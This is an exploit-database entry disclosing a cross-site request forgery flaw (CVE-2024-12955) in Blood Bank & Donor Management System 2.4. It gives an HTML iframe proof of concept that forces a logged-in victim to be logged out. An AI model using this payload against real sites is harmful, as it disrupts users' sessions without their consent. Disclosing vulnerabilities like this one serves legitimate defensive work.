Exploit for Blood Bank and Donor Management System 2.4 Cross Site Request Forgery CVE-2024-12955

## https://sploitus.com/exploit?id=PACKETSTORM:190568
# Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation
    # Google Dork: N/A
    # Date: 2024-12-26
    # Exploit Author: Kwangyun Keum
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
    # Version: 2.4
    # Tested on: Windows 10 / Kali Linux with Apache and MySQL
    # CVE: CVE-2024-12955
    
    ## Description:
    Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
    Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
    functionalities such as logout. An attacker can craft a malicious iframe
    embedding the logout URL and trick a victim into clicking it. This results
    in the victim being logged out without their consent.
    
    ## Steps to Reproduce:
    1. Deploy Blood Bank & Donor Management System v2.4.
    2. Log in as any user.
    3. Use the following PoC to demonstrate the issue:
    
       ```html
       <html>
         <body>
           <iframe
             src="http://localhost/bbdms/logout.php"
             style="border:0px #FFFFFF none;"
             name="myLogoutFrame"
             scrolling="no"
             frameborder="1"
             marginheight="0px"
             marginwidth="0px"
             height="400px"
             width="600px"
             allowfullscreen>
           </iframe>
         </body>
       </html>
    4. Save the above HTML code as logout_poc.html.
    5.Open the file in a browser and click anywhere on the page to trigger the
    logout.